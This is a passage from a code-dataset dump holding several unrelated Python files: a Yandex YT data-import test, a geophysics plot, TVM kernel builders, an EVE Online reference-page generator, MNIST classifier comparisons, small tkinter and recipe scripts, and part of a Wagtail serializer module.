mock.MagicMock(return_value=1562061078.828523))\n@mock.patch(\"crypta.graph.data_import.soup.lib.task.SoupTask._set_expiration\", lambda self: 42)\n@canonize_output\ndef test_bt_task(local_yt, conf):\n \"\"\" Should check is metrika bt task work correct \"\"\"\n\n @load_fixtures(\n (\"{conf.paths.stream.storage}/table_1\".format(conf=conf), \"/fixtures/table_1.json\"),\n (\"{conf.paths.stream.storage}/table_2\".format(conf=conf), \"/fixtures/table_2.json\"),\n (\"{conf.paths.stream.storage}/table_3\".format(conf=conf), \"/fixtures/table_3.json\"),\n (\"{conf.paths.storage.soup}/yandexuid_icookie_cookie_wl\".format(conf=conf), \"/fixtures/soup_wl.json\"),\n (\"{conf.paths.storage.soup}/gaid_mm_device_id_app-metrica_mm\".format(conf=conf), \"/fixtures/soup_mm.json\"),\n # this table should not be in processed (should check is not recursive lookup)\n (\"{conf.paths.storage.soup}/ids/yandexuid\".format(conf=conf), \"/fixtures/ids_yuid.json\"),\n )\n @clean_up(observed_paths=(\"//home\",))\n def inner_test(local_yt, conf):\n attrs = json.loads(resource.find(\"/fixtures/attr_processed.json\"))\n for table in xrange(1, 4):\n local_yt.yt_client.set(\n \"{conf.paths.stream.storage}/table_{index}/@processed\".format(conf=conf, index=table), attrs\n )\n\n task = SoupTask(run_date=\"2018-09-15\", log_sources=\"mm\", commit_full_day=\"false\")\n execute(task)\n\n assert task.query_template == \"soup.sql.j2\"\n assert task.crypta_env == \"develop\"\n\n def select_all(table):\n return list(local_yt.yt_client.read_table(table, format=\"json\"))\n\n unmount(local_yt.yt_client, conf.paths.stream.processed)\n\n output = {\n \"soup\": {\n path.replace(conf.paths.crypta_root, \"//crypta_root\"): sorted(select_all(path))\n for path in local_yt.yt_client.search(conf.paths.storage.soup, node_type=[\"table\"], follow_links=True)\n },\n \"stream\": {\n path.replace(conf.paths.crypta_root, \"//crypta_root\"): sorted(select_all(path))\n for path in local_yt.yt_client.search(\n conf.paths.stream.storage, node_type=[\"table\"], follow_links=True\n )\n },\n \"processed\": sorted(select_all(conf.paths.stream.processed)),\n }\n\n return output\n\n return inner_test(local_yt, conf)\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"crypto/tests/test (10).py","file_name":"test (10).py","file_ext":"py","file_size_in_byte":5109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37603587318","text":"import numpy as np\nimport h5py\n\nimport viscojapan as vj\n\nfid1 = h5py.File('../disp.h5','r')\ndisp1 = vj.epoch_3d_array.Displacement.load(fid1)\n\nfid2 = h5py.File('../one_soft_channel_model/disp.h5','r')\ndisp2 = vj.epoch_3d_array.Displacement.load(fid2)\n\n\ndef align_yaxis(ax1, v1, ax2, v2):\n \"\"\"adjust ax2 ylimit so that v2 in ax2 is aligned to v1 in ax1\"\"\"\n _, y1 = ax1.transData.transform((0, v1))\n _, y2 = ax2.transData.transform((0, v2))\n inv = ax2.transData.inverted()\n _, dy = inv.transform((0, 0)) - inv.transform((0, y1-y2))\n miny, maxy = ax2.get_ylim()\n ax2.set_ylim(miny+dy, maxy+dy)\n\nsite = 'J550'\ncmpt = 'e'\n\nys1 = disp1.post_ts(site, cmpt)\nvel1 = disp1.vel_ts(site, cmpt)*365\nts1 = np.asarray(disp1.get_epochs(), float)/365.\n\nys2 = disp2.post_ts(site, cmpt)\nvel2 = disp2.vel_ts(site, cmpt)*365\nts2 = np.asarray(disp2.get_epochs(), float)/365.\n\n############\n# Start to plot\n\nfrom pylab import plt\n\nfig, ax1 = plt.subplots()\n\npos1 = ax1.get_position() # get the original position \npos2 = [pos1.x0, pos1.y0, pos1.width/1.1 , pos1.height] \nax1.set_position(pos2)\n\nln1 = ax1.plot(ts1, ys1,'bx-', label='disp.')\nln2 = ax1.plot(ts2, ys2,'gx-', label='disp. - one channel')\n\n#ax1.set_ylim([-1e-6,2e-6])\n\n#####################\n\nax2 = ax1.twinx()\n\nln3 = ax2.plot(ts1[1:], vel1, 'r', label=r'vel ($yr^{-1}$)')\nln4 = ax2.plot(ts2[1:], vel2, color='brown', label=r'vel ($yr^{-1}$) - one channel')\n\n#ax2.set_xlim([0,10])\nax2.set_ylabel(r'$yr^{-1}$')\n#ax2.set_ylim([-1e-6, 2e-6])\n\nax2.set_position(pos2)\n\nalign_yaxis(ax1, 0, ax2, 0)\n\n\nlns = ln1 + ln2 + ln3 + ln4\nlabs = [l.get_label() for l in lns]\n\nplt.legend(lns, labs, loc=5,prop={'size':6})\n\nplt.title('%s - %s'%(site, cmpt))\nplt.savefig('%s_%s.png'%(site, cmpt))\nplt.xlabel('year')\nplt.grid('on')\n\n#########\n\nplt.show()\nplt.close()\n\n","repo_name":"zy31415/viscojapan","sub_path":"inversions/inversion10/iter2/check_unit_pulse_decay/plots/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"30840149725","text":"import tvm\nimport numpy as np\nimport os\nimport jinja2\nimport subprocess\n\nclass PTOp:\n def __init__(self, name, target, inputs, outputs, output_shapes, so_file, namespace=\"sparse\"):\n self.namespace = namespace\n self.inputs = inputs\n self.outputs = list(zip(outputs, output_shapes))\n self.so = so_file\n self.cuda = target == \"cuda\"\n self.name = name\n\ndef compat_dtype(dtype):\n if dtype == \"int32\":\n return \"int64_t\"\n if dtype == \"int64\":\n return \"int64_t\"\n if dtype == \"float32\":\n return \"double\"\n if dtype == \"float64\":\n return \"double\"\ndef exact_dtype(dtype):\n if dtype == \"int32\":\n return \"int32_t\"\n if dtype == \"int64\":\n return \"int64_t\"\n if dtype == \"float32\":\n return \"float\"\n if dtype == \"float64\":\n return \"double\"\n\ndef build_for_pt(s, variables, tgt, target_host, name):\n f = tvm.build(s, variables, tgt, target_host=target_host, name=name)\n inputs = []\n input_shapes = {}\n outputs = []\n for var in variables:\n if hasattr(var, \"op\") and var.op in s.outputs:\n outputs.append(var)\n else:\n if hasattr(var, \"shape\"):\n for i, v in enumerate(var.shape):\n if v not in input_shapes:\n input_shapes[v] = (var.name, i)\n else:\n var.input_dtype = compat_dtype(var.dtype)\n var.real_dtype = exact_dtype(var.dtype)\n input_shapes[var.name] = (var.name, -1)\n inputs.append(var)\n print([(type(i), i.dtype) for i in inputs])\n output_shapes = []\n for output in outputs:\n o_shape = []\n for i, v in enumerate(output.shape):\n if v not in input_shapes:\n raise Exception(f\"Can't handle dim {v} in {output}\")\n o_shape.append(input_shapes[v])\n output_shapes.append(o_shape)\n path = \"tvm_gen/\"\n try:\n os.mkdir(path)\n except:\n pass\n so_file = os.path.join(path, f\"{name}_{tgt}.so\")\n f.export_library(so_file)\n with open(\"tvm_template.cpp\", \"r\") as template_f:\n template = jinja2.Template(template_f.read())\n source = template.render(op=PTOp(name, tgt, inputs, outputs, output_shapes, so_file))\n\n # clang format stuff\n source = source.split('\\n')\n source = filter(lambda x: x.strip()!=\"\", source)\n source = \"\\n\".join(source)\n cpp_file = os.path.join(path, f\"{name}_{tgt}.cpp\")\n with open(cpp_file, \"w\") as f:\n f.write(source)\n retcode=subprocess.call([\"clang-format\", \"-i\", \"-style=Google\", cpp_file])\n\ndef add():\n tgt_host=\"llvm\"\n tgt=\"llvm\"\n n = tvm.var(\"n\")\n A = tvm.placeholder((n,), name='A', dtype=\"float32\")\n B = tvm.placeholder((n,), name='B', dtype=\"float32\")\n C = tvm.compute(A.shape, lambda i: A[i] + B[i], name=\"C\")\n s = tvm.create_schedule(C.op)\n build_for_pt(s, [A, B, C], tgt, tgt_host, \"myadd\")\n\ndef mm():\n tgt_host=\"llvm\"\n tgt=\"llvm\"\n n = tvm.var(\"n\")\n m = tvm.var(\"m\")\n k = tvm.var(\"k\")\n k_reduce = tvm.reduce_axis((0, k), \"k_reduce\")\n A = tvm.placeholder((n,k), name='A', dtype=\"float32\")\n B = tvm.placeholder((k,m), name='B', dtype=\"float32\")\n C = tvm.compute((n, m), lambda i, j: tvm.sum(A[i, k_reduce] * B[k_reduce, j], axis=k_reduce), name=\"C\")\n s = tvm.create_schedule(C.op)\n build_for_pt(s, [A, B, C], tgt, tgt_host, \"mymm\")\n\nadd()\nmm()\n\ndef nontensor():\n tgt_host=\"llvm\"\n tgt=\"llvm\"\n n = tvm.var(\"n\")\n m = tvm.var(\"m\", dtype=\"float32\")\n A = tvm.placeholder((n,n), name='A', dtype=\"float32\")\n B = tvm.compute(A.shape, lambda i, j: A[i,j] * m, name=\"B\")\n s = tvm.create_schedule(B.op)\n build_for_pt(s, [A, m, B], tgt, tgt_host, \"myscale\")\n\nnontensor()\n\n","repo_name":"bwasti/sparse","sub_path":"tvm_kernels.py","file_name":"tvm_kernels.py","file_ext":"py","file_size_in_byte":3467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3785727770","text":"import os\nimport sys\nimport shutil\nimport codecs\nimport yaml\nimport json\nimport collections\nimport sqlalchemy\nimport sqlalchemy.ext.declarative\n\n\n# CategoryID: 18, GroupID: 101 - Mining Drone\n# CategoryID: 22, GroupID: 361 - Mobile Warp Disruptor\n# CategoryID: 22, GroupID: 1249 - Mobile Cyno Inhibitor \n# CategoryID: 22, GroupID: 1250 - Mobile Tractor Unit\n# CategoryID: 23, GroupID: 365 - Control Tower\n# CategoryID: 23, GroupID: 404 - Silo\n# CategoryID: 23, GroupID: 444 - Shield Hardening Array\n# CategoryID: 23, GroupID: 839 - Cynosural System Jammer\n# CategoryID: 23, GroupID: 1282 - Compression Array\n# CategoryID: 46, GroupID: 1025 - Orbital Infrastructure\n# CategoryID: 65, GroupID: 1404 - Engineering Complex\n# CategoryID: 65, GroupID: 1406 - Refinery\n# CategoryID: 65, GroupID: 1657 - Citadel\n# CategoryID: 87, GroupID: 1652 - Light Fighter \n\n\nLCID = collections.OrderedDict(\n en='English',\n ja='Japanese',\n ru='Russian',\n de='German',\n fr='French',\n zh='Chinese'\n)\n\nBase = sqlalchemy.ext.declarative.declarative_base()\nclass Category(Base):\n __tablename__ = 'categories'\n id = sqlalchemy.Column(sqlalchemy.Integer, primary_key=True)\n name = sqlalchemy.Column(sqlalchemy.String)\n\n\nclass Group(Base):\n __tablename__ = 'groups'\n id = sqlalchemy.Column(sqlalchemy.Integer, primary_key=True)\n categoryID = sqlalchemy.Column(sqlalchemy.Integer, sqlalchemy.ForeignKey('categories.id'))\n name = sqlalchemy.Column(sqlalchemy.String)\n\n category = sqlalchemy.orm.relationship('Category', backref=sqlalchemy.orm.backref('groups', order_by=id))\n\n\nclass Type(Base):\n __tablename__ = 'types'\n id = sqlalchemy.Column(sqlalchemy.Integer, primary_key=True) \n groupID = sqlalchemy.Column(sqlalchemy.Integer, sqlalchemy.ForeignKey('groups.id'))\n raceID = sqlalchemy.Column(sqlalchemy.Integer)\n factionID = sqlalchemy.Column(sqlalchemy.Integer)\n name = sqlalchemy.Column(sqlalchemy.String)\n traits = sqlalchemy.Column(sqlalchemy.String)\n description = sqlalchemy.Column(sqlalchemy.String)\n\n group = sqlalchemy.orm.relationship('Group', backref=sqlalchemy.orm.backref('types', order_by=id))\n\n\nurl = 'sqlite+pysqlite:///eveonline.sqlite'\nengine = sqlalchemy.create_engine(url)\n\nSession = sqlalchemy.orm.sessionmaker(bind=engine)\nsession = Session()\n\n\ndef import_fsd():\n def load_yaml(path):\n print('Load: ' + path)\n with codecs.open(path, 'r', 'utf-8') as f:\n data = yaml.load(f)\n\n return data\n \n categoryIDs = load_yaml('./fsd/categoryIDs.yaml') \n groupIDs = load_yaml('./fsd/groupIDs.yaml')\n typeIDs = load_yaml('./fsd/typeIDs.yaml') \n \n Base.metadata.drop_all(bind=engine)\n Base.metadata.create_all(bind=engine) \n \n def id(key):\n try: v = items[key]\n except KeyError: v = ''\n return v\n\n def dumps(key):\n try: v = items[key]\n except KeyError: v = ''\n return json.dumps(v)\n\n for i, items in categoryIDs.items(): \n session.add(Category(id=i, name=dumps('name')))\n \n for i, items in groupIDs.items():\n session.add(Group(id=i, categoryID=id('categoryID'), name=dumps('name')))\n\n for i, items in typeIDs.items(): \n session.add(Type(\n id = i,\n groupID = id('groupID'), \n raceID = id('raceID'),\n factionID = id('factionID'),\n name = dumps('name'),\n traits = dumps('traits'),\n description = dumps('description')\n ))\n\n session.commit()\n\n\ndef json2locale(text):\n dict_ = collections.OrderedDict()\n json_dict = json.loads(text)\n\n dict_['id'] = ''\n for key_ in LCID.keys(): \n if key_ in json_dict:\n dict_[key_] = json_dict[key_]\n elif 'en' in json_dict:\n dict_[key_] = json_dict['en']\n else:\n dict_[key_] = '' \n\n return dict_\n\n\ndef write_html(name, title, body):\n html = '' + title + ''\n html += ''\n html += ''\n html += body\n html += ''\n\n with open('./docs/' + name + '.html', 'w', encoding='utf-8') as f:\n f.write(html)\n\n\ndef locales_table(path, rows):\n html = ''\n for locale_name in LCID.values():\n html += ''\n html += ''\n\n for row in rows:\n html += ''\n\n for lcid, name in row.items():\n if lcid == 'id':\n html += '' % (path, name, name)\n else:\n html += ''\n\n html += ''\n\n html += '
ID' + locale_name + '
%d' + name + '
'\n return html\n\n\ndef read_type(name, type_):\n html = ''\n names = json2locale(type_.name)\n descriptions = json2locale(type_.description)\n for id_, lc_name in LCID.items():\n html += ''\n html += ''\n html += ''\n html += '
NameDescription
' + lc_name + '' + names[id_] + '' + descriptions[id_] + '
'\n\n write_html('type/%d' % type_.id, name, html)\n\n\ndef read_group(name, group):\n rows = []\n for type_ in group.types:\n locale = json2locale(type_.name)\n locale['id'] = type_.id\n rows.append(locale)\n\n read_type(locale['en'], type_)\n\n write_html('group/%d' % group.id, name, locales_table('../type/', rows))\n\n\ndef read_category(name, category):\n rows = []\n for group in category.groups:\n locale = json2locale(group.name)\n locale['id'] = group.id\n rows.append(locale)\n\n read_group(locale['en'], group)\n\n write_html('category/%d' % category.id, name, locales_table('../group/', rows))\n\n\n\nif len(sys.argv) > 1:\n if sys.argv[1] == '--import':\n import_fsd()\nelse:\n for path in ['./docs/category/', './docs/group/', './docs/type/']:\n if os.path.isdir(path):\n shutil.rmtree(path)\n\n os.mkdir(path)\n shutil.copy('./evepedia.css', path + 'evepedia.css')\n shutil.copy('./favicon.jpg', path + 'favicon.jpg')\n\n rows = []\n base_categories = [\n 6, # Ship\n 7, # Module\n 8, # Charge\n 16, # Skill\n 20, # Implant\n 32, # Subsystem\n ]\n for category_id in [6, 18, 22, 23, 46, 65, 87]:\n category = session.query(Category).filter_by(id=category_id).one()\n locale = json2locale(category.name)\n locale['id'] = category_id\n rows.append(locale)\n\n read_category(locale['en'], category)\n\n write_html('index', 'Evepedia', locales_table('./category/', rows))\n","repo_name":"Omochin/evepedia","sub_path":"Evepedia.py","file_name":"Evepedia.py","file_ext":"py","file_size_in_byte":6821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29672980428","text":"from sklearn.datasets import fetch_mldata\r\nfrom sklearn.linear_model import SGDClassifier\r\nfrom sklearn.metrics import accuracy_score\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom sklearn import cross_validation\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nimport timeit\r\nfrom sklearn.svm import LinearSVC\r\nfrom sklearn.metrics import confusion_matrix\r\nfrom sklearn.model_selection import cross_val_score\r\nfrom sklearn.model_selection import cross_val_predict\r\nimport warnings\r\nfrom sklearn.metrics import precision_score, recall_score\r\nwarnings.filterwarnings(\"ignore\")\r\n\r\n#Getting MNIST data\r\nmnist = fetch_mldata('MNIST original')\r\n#Dividing the data into Label and Target\r\nX,y=mnist[\"data\"],mnist[\"target\"]\r\n\r\n#Dividing the data into Training Dataset and Testing Dataset\r\nX_train, X_test, y_train, y_test = X[:60000], X[60000:], y[:60000], y[60000:]\r\nshuffle_index = np.random.permutation(60000)\r\nX_train, y_train = X_train[shuffle_index], y_train[shuffle_index]\r\n\r\n#stochastic gradient descent Model\r\nsgd_clf = SGDClassifier()\r\n\r\n#Traing my model\r\nsgd_clf.fit(X_train, y_train)\r\n\r\n#prediction\r\ny_pred_sgd = sgd_clf.predict(X_test)\r\n\r\n#Accuracy\r\nacc_sgd = accuracy_score(y_test, y_pred_sgd)\r\n\r\nprint (\"stochastic gradient descent accuracy: \",acc_sgd)\r\n\r\n\"\"\"Sometimes You will get 99% Accuracy but you need to check the cross validation values \r\nand precision score as well as the recall score. \"\"\"\r\n\r\ncross_val=cross_val_score(sgd_clf, X_train, y_train, cv=3, scoring=\"accuracy\")\r\nprint(\"Cross Validation Value:\",cross_val)\r\n\r\ny_train_pred = cross_val_predict(sgd_clf, X_train, y_train, cv=3)\r\n\r\n#Confussion matrix\r\nconf_mx=confusion_matrix(y_train, y_train_pred)\r\nprint(\"Confussion matrix:\",conf_mx)\r\nps=precision_score(y_train, y_train_pred,average=\"macro\")\r\nprint(\"Precision Score:\",ps)\r\nrs=recall_score(y_train, y_train_pred,average=\"macro\")\r\nprint(\"Recall Score:\",rs)\r\n\"\"\"Here i am showing you the graph of the confussion matrix. more the bright more erroneous it is. \r\n so by getting the confussion matrix graph we canlearn from it and we can change the values of \r\n classifier or by removing the noise from the images we can get the optimized result\"\"\"\r\nplt.matshow(conf_mx, cmap=plt.cm.gray)\r\nplt.show()\r\nprint(\"_\"*100)\r\n########################################################################################################\r\n\r\n#Random Forest Classifier\r\nclf_rf = RandomForestClassifier()\r\n\r\n#Traing my model\r\nclf_rf.fit(X_train, y_train)\r\n\r\n#Making the prediction\r\ny_pred_rf = clf_rf.predict(X_test)\r\n\r\n#Measuring the accuracy of machine\r\nacc_rf = accuracy_score(y_test, y_pred_rf)\r\nprint (\"random forest accuracy: \",acc_rf)\r\n\r\n#Cross Validation\r\ncross_val=cross_val_score(clf_rf, X_train, y_train, cv=3, scoring=\"accuracy\")\r\nprint(cross_val)\r\ny_train_pred = cross_val_predict(clf_rf, X_train, y_train, cv=3)\r\nprint(y_train_pred)\r\n\r\n#Confussion matrix\r\nconf_mx=confusion_matrix(y_train, y_train_pred)\r\nprint(\"Confussion matrix:\",conf_mx)\r\nps=precision_score(y_train, y_train_pred,average=\"macro\")\r\nprint(\"Precision Score:\",ps)\r\nrs=recall_score(y_train, y_train_pred,average=\"macro\")\r\nprint(\"Recall Score:\",rs)\r\n\"\"\"Here i am showing you the graph of the confussion matrix. more the bright more erroneous it is. \r\n so by getting the confussion matrix graph we canlearn from it and we can change the values of \r\n classifier or by removing the noise from the images we can get the optimized result\"\"\"\r\nplt.matshow(conf_mx, cmap=plt.cm.gray)\r\nplt.show()\r\nprint(\"_\"*100)\r\n########################################################################################################################\r\n\r\n#Support vector classifier\r\nclf_svm = LinearSVC()\r\n\r\n#Training the model\r\nclf_svm.fit(X_train, y_train)\r\n\r\ny_pred_svm = clf_svm.predict(X_test)\r\nacc_svm = accuracy_score(y_test, y_pred_svm)\r\nprint (\"Linear SVM accuracy: \",acc_svm)\r\ncross_val=cross_val_score(clf_svm, X_train, y_train, cv=3, scoring=\"accuracy\")\r\nprint(cross_val)\r\ny_train_pred = cross_val_predict(clf_svm, X_train, y_train, cv=3)\r\nprint(y_train_pred)\r\n\r\n#Confussion matrix\r\nconf_mx=confusion_matrix(y_train, y_train_pred)\r\nprint(\"Confussion matrix:\",conf_mx)\r\nps=precision_score(y_train, y_train_pred,average=\"macro\")\r\nprint(\"Precision Score:\",ps)\r\nrs=recall_score(y_train, y_train_pred,average=\"macro\")\r\nprint(\"Recall Score:\",rs)\r\n\"\"\"Here i am showing you the graph of the confussion matrix. more the bright more erroneous it is. \r\n so by getting the confussion matrix graph we canlearn from it and we can change the values of \r\n classifier or by removing the noise from the images we can get the optimized result\"\"\"\r\nplt.matshow(conf_mx, cmap=plt.cm.gray)\r\nplt.show()\r\nprint(\"_\"*100)\r\n\r\n########################################################################################################################\r\n\r\nclf_knn = KNeighborsClassifier()\r\nclf_knn.fit(X_train, y_train)\r\ny_pred_knn = clf_knn.predict(X_test)\r\nacc_knn = accuracy_score(y_test, y_pred_knn)\r\nprint (\"nearest neighbors accuracy: \",acc_knn)\r\ncross_val=cross_val_score(clf_knn, X_train, y_train, cv=3, scoring=\"accuracy\")\r\nprint(cross_val)\r\ny_train_pred = cross_val_predict(clf_knn, X_train, y_train, cv=3)\r\nprint(y_train_pred)\r\n\r\n#Confussion matrix\r\nconf_mx=confusion_matrix(y_train, y_train_pred)\r\nprint(\"Confussion matrix:\",conf_mx)\r\nps=precision_score(y_train, y_train_pred,average=\"macro\")\r\nprint(\"Precision Score:\",ps)\r\nrs=recall_score(y_train, y_train_pred,average=\"macro\")\r\nprint(\"Recall Score:\",rs)\r\n\"\"\"Here i am showing you the graph of the confussion matrix. more the bright more erroneous it is. \r\n so by getting the confussion matrix graph we canlearn from it and we can change the values of \r\n classifier or by removing the noise from the images we can get the optimized result\"\"\"\r\nplt.matshow(conf_mx, cmap=plt.cm.gray)\r\nplt.show()\r\nprint(\"_\"*100)\r\n","repo_name":"kumarsrikant/Mnist_Handwritten_Digit_Classification","sub_path":"HandWrittenDigitClassification.py","file_name":"HandWrittenDigitClassification.py","file_ext":"py","file_size_in_byte":5899,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"5563336081","text":"from tkinter import *\nimport sqlite3\nimport sys\nimport os\n\ndef restart_program(root):\n\tpython = sys.executable\n\tos.execl(python, python, * sys.argv)\n\ndef execute_sql(qentry):\n\tscript = qentry.get()\n\tqentry.delete(0, END)\n\n\t# connect database\n\tconn = sqlite3.connect('database.db')\n\tc = conn.cursor()\n\t# execute sql script\n\tc.execute('''PRAGMA foreign_keys = ON''')\n\tprint(c.execute(script).fetchall())\n\t# print(c.execute(\"SELECT * FROM REPORT_BUG\").fetchall())\n\tconn.commit()\n\tconn.close()\n\n\treturn\n\ndef query_page(root):\n\t# query page element declaration\n\tqtitle = Label(text=\"Please enter SQL\", font=(\"Arial\", 10))\n\tqentry = Entry(root, width=50)\n\tget_button = Button(root, text=\"execute\", command=lambda: execute_sql(qentry))\n\tback_button = Button(root, text=\"restart\", command=lambda: restart_program(root))\n\n\t# query page element position\n\tqtitle.grid(row=0, column=0, columnspan=2)\n\tqentry.grid(row=1, column=0, columnspan=2)\n\tget_button.grid(row=2, column=0)\n\tback_button.grid(row=2, column=1)","repo_name":"tsaoni/DBMS","sub_path":"query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6924293155","text":"import pickle\n\n\ndef main():\n def display_recipe(recipe):\n new_line = \"\\n \\t \\t\"\n print(\n f\"\"\"\n Recipe: {recipe[\"name\"]}\n Cooking Time (min): {recipe[\"cooking_time\"]}\n Ingredients: \n {new_line.join(f\"{ingredient}\" for ingredient in recipe[\"ingredients\"])}\n Dificulty: {recipe[\"difficulty\"]}\"\"\"\n )\n\n def search_ingredients(data):\n recipes_list, ingredients_list = data.values()\n for a, ingredient in enumerate(ingredients_list):\n print(f\"[{a}] {ingredient}\")\n try:\n ingredient_searched = ingredients_list[\n int(input(\"Pick a number from the ingredient list: \"))\n ]\n except ValueError:\n print(\"Value not a number\")\n except IndexError:\n print(\"Value outside the range of recipes\")\n else:\n for recipe in recipes_list:\n if ingredient_searched in recipe[\"ingredients\"]:\n display_recipe(recipe)\n\n file_name = input(\"Please enter a file name: \")\n try:\n with open(file_name, \"rb\") as recipes_file:\n data = pickle.load(recipes_file)\n except FileNotFoundError:\n print(\"Flie does not exist\")\n else:\n search_ingredients(data)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"juanpialvarez/python-specialization","sub_path":"Part 1/1.4/recipes_search.py","file_name":"recipes_search.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33789328630","text":"dados=[]\narq =open('lista.txt','r')\n\nwhile True:\n print('== MENU ==')\n print('== 1 Cadastrar==')\n print('==2 Listar==')\n print('3 remover')\n opcao=input('Opção?')\n\n\n if opcao=='1':\n\n dados.append(input('Digite o item:'))\n print('item adicionado.')\n\n elif opcao =='2':\n for item in dados:\n print('--'*20)\n print(item)\n print('--' * 20)\n\n elif opcao =='3':\n item=input('item a ser removido?')\n if item in dados:\n dados.remove(item)\n print('item removido')\n\n arq=open(\"lista.txt\",'w')\n for item in dados:\n arq.write(item+'\\n')\n\n\n arq.close()\n\n","repo_name":"davigledson/Programacao-Estruturada-e-Orientada-a-Objetos","sub_path":"Programação Estruturada/aula10-arquivos/ex001.py","file_name":"ex001.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"pt","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"34736267810","text":"from functools import lru_cache\n\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.db import models\nfrom django.db.models.constants import LOOKUP_SEP\nfrom treebeard.mp_tree import MP_Node\nfrom wagtail import hooks\nfrom wagtail.models import Page\n\nfrom .field_adapters import adapter_registry\nfrom .models import get_base_model\n\n\ndef _get_subclasses_recurse(model):\n \"\"\"\n Given a Model class, find all related objects, exploring children\n recursively, returning a `list` of strings representing the\n relations for select_related, adapted from https://github.com/jazzband/django-model-utils/blob/master/model_utils/managers.py\n \"\"\"\n\n related_objects = [f for f in model._meta.get_fields() if isinstance(f, models.OneToOneRel)]\n\n rels = [\n rel for rel in related_objects\n if isinstance(rel.field, models.OneToOneField)\n and issubclass(rel.field.model, model)\n and model is not rel.field.model\n and rel.parent_link\n ]\n\n subclasses = []\n for rel in rels:\n for subclass in _get_subclasses_recurse(rel.field.model):\n subclasses.append(\n rel.get_accessor_name() + LOOKUP_SEP + subclass)\n subclasses.append(rel.get_accessor_name())\n return subclasses\n\n\ndef _get_sub_obj_recurse(obj, s):\n \"\"\"\n Given an object and its potential subclasses in lookup string form,\n retrieve its most specific subclass recursively\n Taken from: https://github.com/jazzband/django-model-utils/blob/master/model_utils/managers.py\n \"\"\"\n rel, _, s = s.partition(LOOKUP_SEP)\n\n try:\n node = getattr(obj, rel)\n except ObjectDoesNotExist:\n return None\n if s:\n child = _get_sub_obj_recurse(node, s)\n return child\n else:\n return node\n\n\ndef get_subclass_instances(instances, subclasses):\n subclass_instances = []\n for obj in instances:\n sub_obj = None\n for s in subclasses:\n sub_obj = _get_sub_obj_recurse(obj, s)\n if sub_obj:\n break\n if not sub_obj:\n sub_obj = obj\n subclass_instances.append(sub_obj)\n return subclass_instances\n\n\nclass ModelSerializer:\n ignored_fields = []\n\n def __init__(self, model):\n self.model = model\n self.base_model = get_base_model(model)\n\n field_adapters = []\n adapter_managed_fields = []\n for field in self.model._meta.get_fields():\n if field.name in self.ignored_fields:\n continue\n\n # ignore primary keys (including MTI parent pointers)\n if getattr(field, 'primary_key', False):\n continue\n\n adapter = adapter_registry.get_field_adapter(field)\n\n if adapter:\n adapter_managed_fields = adapter_managed_fields + adapter.get_managed_fields()\n field_adapters.append(adapter)\n\n self.field_adapters = [adapter for adapter in field_adapters if adapter.name not in adapter_managed_fields]\n\n def get_objects_by_ids(self, ids):\n \"\"\"\n Given a list of IDs, return a list of model instances that we can\n run serialize and get_object_references on, fetching the specific subclasses\n if using multi table inheritance as appropriate\n \"\"\"\n base_queryset = self.model.objects.filter(pk__in=ids)\n subclasses = _get_subclasses_recurse(self.model)\n return get_subclass_instances(base_queryset, subclasses)\n\n def serialize_fields(self, instance):\n return {\n field_adapter.name: field_adapter.serialize(instance)\n for field_adapter in self.field_adapters\n }\n\n def serialize(self, instance):\n return {\n 'model': self.model._meta.label_lower,\n 'pk': instance.pk,\n 'fields': self.serialize_fields(instance)\n }\n\n def get_object_references(self, instance):\n refs = {\n # always include the primary key as an object reference\n (self.base_model, instance.pk)\n }\n for f in self.field_adapters:\n refs.update(f.get_object_references(instance))\n return refs\n\n def get_objects_to_serialize(self, instance):\n objects = set()\n for f in self.field_adapters:\n objects.update(f.get_objects_to_serialize(instance))\n return objects\n\n\nclass TreeModelSerializer(ModelSerializer):\n ignored_fields = ['path', 'depth', 'numchild']\n\n def serialize(self, instance):\n result = super().serialize(instance)\n if instance.is_root():\n result['parent_id'] = None\n else:\n result['parent_id'] = instance.get_parent().pk\n\n return result\n\n def get_object_references(self, instance):\n refs = super().get_object_references(instance)\n if not instance.is_root():\n # add a reference for the parent ID\n refs.add(\n (self.base_model, instance.get_parent().pk)\n )\n return refs\n\n\nclass PageSerializer(TreeModelSerializer):\n ignored_fields = TreeModelSerializer.ignored_fields + [\n 'url_path', 'content_type', 'draft_title', 'has_unpublished_changes', 'owner',\n 'go_live_at', 'expire_at', 'expired', 'locked', 'first_published_at', 'last_published_at',\n 'latest_revision_created_at', 'live_revision',\n ]\n\n def get_objects_by_ids(self, ids):\n # serialize method needs the instance in its specific form\n return self.model.objects.filter(pk__in=ids).specific()\n\n\nclass SerializerRegistry:\n BASE_SERIALIZERS_BY_MODEL_CLASS = {\n models.Model: ModelSerializer,\n MP_Node: TreeModelSerializer,\n Page: PageSerializer,\n }\n\n def __init__(self):\n self._scanned_for_serializers = False\n self.serializers_by_model_class = {}\n\n def _scan_for_serializers(self):\n serializers = dict(self.BASE_SERIALIZERS_BY_MODEL_CLASS)\n\n for fn in hooks.get_hooks('register_custom_serializers'):\n serializers.update(fn())\n\n self.serializers_by_model_class = serializers\n self._scanned_for_serializers = True\n\n @lru_cache(maxsize=None)\n def get_model_serializer(self, model):\n # find the serializer class for the most specific class in the model's inheritance tree\n\n if not self._scanned_for_serializers:\n 